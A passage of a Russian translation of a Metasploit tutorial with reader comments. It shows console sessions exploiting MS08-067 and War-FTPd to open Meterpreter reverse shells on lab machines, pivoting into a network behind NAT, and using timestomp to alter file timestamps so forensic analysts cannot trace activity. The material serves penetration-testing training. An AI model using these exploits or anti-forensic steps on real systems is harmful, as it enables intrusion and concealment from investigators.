[*] Triggering the vulnerability... [*] Transmitting intermediate stager for over-sized stage...(216 bytes) [*] Sending stage (2650 bytes) [*] Sleeping before handling stage... [*] Uploading DLL (205835 bytes)... [*] Upload completed. [*] Meterpreter session 2 opened (10.10.1.109:9000 -> 10.10.1.104:62260) meterpreter > Background session 2? [y/N]y
Мы успешно проэксплуатировали уязвимость системы удаленной сети. Давайте проверим находимся ли мы в той системе где хотели оказаться.
msf exploit(ms08_067_netapi) > sessions -l Active sessions =============== Id Description Tunnel -- ----------- ------ 1 Meterpreter 10.10.1.109:8080 -> 10.10.1.104:62239 2 Meterpreter 10.10.1.109:9000 -> 10.10.1.104:62260 msf exploit(ms08_067_netapi) > sessions -i 2 [*] Starting interaction with 2... meterpreter > execute -f cmd.exe -i Process 3864 created. Channel 1 created. Microsoft Windows [Version 5.2.3790] (C) Copyright 1985-2003 Microsoft Corp. C:\WINDOWS\system32> ipconfig ipconfig Windows IP Configuration Ethernet adapter Local Area Connection 6: Connection-specific DNS Suffix . : localdomain IP Address. . . . . . . . . . . . : 10.211.55.128 Subnet Mask . . . . . . . . . . . : 255.255.255.0 Default Gateway . . . . . . . . . : 10.211.55.2 C:\WINDOWS\system32>
Успех! Мы успешно применили удаленный эксплоит к не маршрутизированной сети10.211.55.0/24. Теперь у нас есть полный доступ к обеим системам - 10.211.55.140 и 10.211.55.128! Если вы заметили, 10.10.1.109 подключен к 10.10.1.104 — который является внешним IP адресом NAT-маршрутизатора. А 10.211.55.128 и 10.211.55.140 соответственно находятся позади NAT-маршрутизатора 10.10.1.104.
TimeStomp
Взаимодействие с большим количеством файлов в системе, подобно прогулкам по снегу — вы оставляете следы. Какие детали можно извлечь из этих следов, и как долго эти следы находятся в системе зависит от множества обстоятельств. Задача по обнаружению следов в системе возлагается на плечи компьютерно-технической экспертизы. Пользуясь ниже приведенными рекомендациями во время пентеста, вы можете затруднить аналитикам анализ действий которые вы предпринимали в системе.
Вообще, лучший способ «не наследить»: не прикасаться к файловой системе! Одним из преимуществ Meterpreter является, то что она загружается в оперативную память и не ведет запись на жесткий диск. Однако в некоторых случаях все-таки может понадобиться производить запись в файловую систему, тут и приходит на помощь timestomp. Давайте взглянем на файл в системе, нас интересует следующая информация: дата его создания, дата последнего обращения к файлу и дата его модификации.
File Path: C:\Documents and Settings\P0WN3D\My Documents\test.txt Created Date: 5/3/2009 2:30:08 AM Last Accessed: 5/3/2009 2:31:39 AM Last Modified: 5/3/2009 2:30:36 AM
Сейчас мы начнем эксплуатацию системы, после чего запустим сессию Meterpreter, а там уже загрузим модуль timestomp и взглянем на интересующий файл.
msf exploit(warftpd_165_user) > exploit [*] Handler binding to LHOST 0.0.0.0 [*] Started reverse handler [*] Connecting to FTP server 172.16.104.145:21... [*] Connected to target FTP server. [*] Trying target Windows 2000 SP0-SP4 English... [*] Transmitting intermediate stager for over-sized stage...(191 bytes) [*] Sending stage (2650 bytes) [*] Sleeping before handling stage... [*] Uploading DLL (75787 bytes)... [*] Upload completed. [*] meterpreter session 1 opened (172.16.104.130:4444 -> 172.16.104.145:1218) meterpreter > use priv Loading extension priv...success. meterpreter > timestomp -h Usage: timestomp file_path OPTIONS OPTIONS: -a Set the "last accessed" time of the file -b Set the MACE timestamps so that EnCase shows blanks -c Set the "creation" time of the file -e Set the "mft entry modified" time of the file -f Set the MACE of attributes equal to the supplied file -h Help banner -m Set the "last written" time of the file -r Set the MACE timestamps recursively on a directory -v Display the UTC MACE values of the file -z Set all four attributes (MACE) of the file meterpreter > pwd C:\Program Files\War-ftpd meterpreter > cd .. meterpreter > pwd C:Program Files meterpreter > cd .. meterpreter > cd Documents\ and\ Settings meterpreter > cd P0WN3D meterpreter > cd My\ Documents meterpreter > ls Listing: C:\Documents and Settings\P0WN3D\My Documents ====================================================== Mode Size Type Last modified Name ---- ---- ---- ------------- ---- 40777/rwxrwxrwx 0 dir Wed Dec 31 19:00:00 -0500 1969 . 40777/rwxrwxrwx 0 dir Wed Dec 31 19:00:00 -0500 1969 .. 40555/r-xr-xr-x 0 dir Wed Dec 31 19:00:00 -0500 1969 My Pictures 100666/rw-rw-rw- 28 fil Wed Dec 31 19:00:00 -0500 1969 test.txt meterpreter > timestomp test.txt -v Modified : Sun May 03 04:30:36 -0400 2009 Accessed : Sun May 03 04:31:51 -0400 2009 Created : Sun May 03 04:30:08 -0400 2009 Entry Modified: Sun May 03 04:31:44 -0400 2009
Теперь снова посмотрим на информацию о файле. Мы видим, что файл был создан недавно. Нам нужно около минуты, чтобы скрыть информацию о доступе к файлу. Одним из способов изменить информацию, это создание копии информации о модификации из другого системного файла. Скопируем эту информацию из системного cmd.exe в test.txt.
meterpreter > timestomp test.txt -f C:\WINNT\system32\cmd.exe [*] Setting MACE attributes on test.txt from C:\WINNT\system32\cmd.exe meterpreter > timestomp test.txt -v Modified : Tue Dec 07 08:00:00 -0500 1999 Accessed : Sun May 03 05:14:51 -0400 2009
Уже седьмая часть перевода курсов и ни одного комментария по качеству перевода и стоит ли переводить дальше :)Обращаюсь к тем кто все это читает, помимо меня, если есть исправления предлагайте, будем переводить вместе ;)
Отличные статьи (перевод), читаю запоем, не могу оторваться.
Зачет и медаль тому человеку, кто все это делает.
Отлично, благодарю за отзыв, буду продолжать переводить :)
Чувак респект тебе за твой статьи очень интересно мне понравилось очень продолжай в том же духе, я давно искал подобное большое спасибо.
Огромный РЕСПЕКТ автору !!!!!!!!!!
Перевод мануала отличный, ждём продолжения….